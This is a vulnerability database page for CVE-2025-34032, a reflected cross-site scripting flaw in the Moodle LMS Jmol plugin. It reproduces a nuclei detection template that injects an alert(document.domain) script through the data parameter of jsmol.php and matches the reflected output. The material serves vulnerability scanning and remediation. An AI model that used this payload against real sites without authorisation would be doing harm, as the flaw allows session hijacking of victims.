Lucene search
+L

Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting

🗓️ 17 Aug 2026 03:58:01Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Vulnerability in Moodle LMS Jmol Plugin <= 6.1 allows Cross-Site Scripting via the data parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2025-34032
24 Jun 202502:47
circl
cnnvd
CNNVD
Moodle LMS Jmol plugin 跨站脚本漏洞
24 Jun 202500:00
cnnvd
cve
CVE
CVE-2025-34032
24 Jun 202500:59
cve
cvelist
Cvelist
CVE-2025-34032 Moodle LMS Jmol Plugin Cross-site Scripting (XSS)
24 Jun 202500:59
cvelist
euvd
EUVD
EUVD-2025-18970
3 Oct 202520:07
euvd
nvd
NVD
CVE-2025-34032
24 Jun 202501:15
nvd
osv
OSV
CVE-2025-34032
24 Jun 202501:15
osv
ptsecurity
Positive Technologies
PT-2025-26659 · Moodle · Moodle Lms Jmol Plugin
24 Jun 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2025-34032
26 Jun 202503:12
redhatcve
vulncheck_kev
VulnCheck KEV
VulnCheck KEV: CVE-2025-34032
23 Jun 202500:00
vulncheck_kev
Rows per page
id: CVE-2025-34032

info:
  name: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting
  author: madrobot,ritikchaddha
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.
  impact: |
    Attackers can execute arbitrary JavaScript in victim browsers through crafted links containing XSS payloads in the data parameter, potentially leading to session hijacking.
  remediation: |
    Upgrade to a patched version of Moodle Jmol plugin that properly sanitizes user input in jsmol.php.
  reference:
    - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34032
  classification:
    epss-score: 0.00626
    epss-percentile: 0.47136
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cve-id: CVE-2025-34032
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: cve,cve2025,moodle,xss,edb,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 41'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and

      - type: regex
        regex:
          - '^<script>alert\(document\.domain\)</script>\s*$'
# digest: 4a0a004730450221008133835afe01d45211627d87da83ec5b6895ca76d1609ee0ab16a53bd6564e9a0220162b3ee624e1cc95dffa07635f16cc53177cd86c794355c6e580ce467f39bab7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.16.1
CVSS 45.1
EPSS0.00626
SSVC
25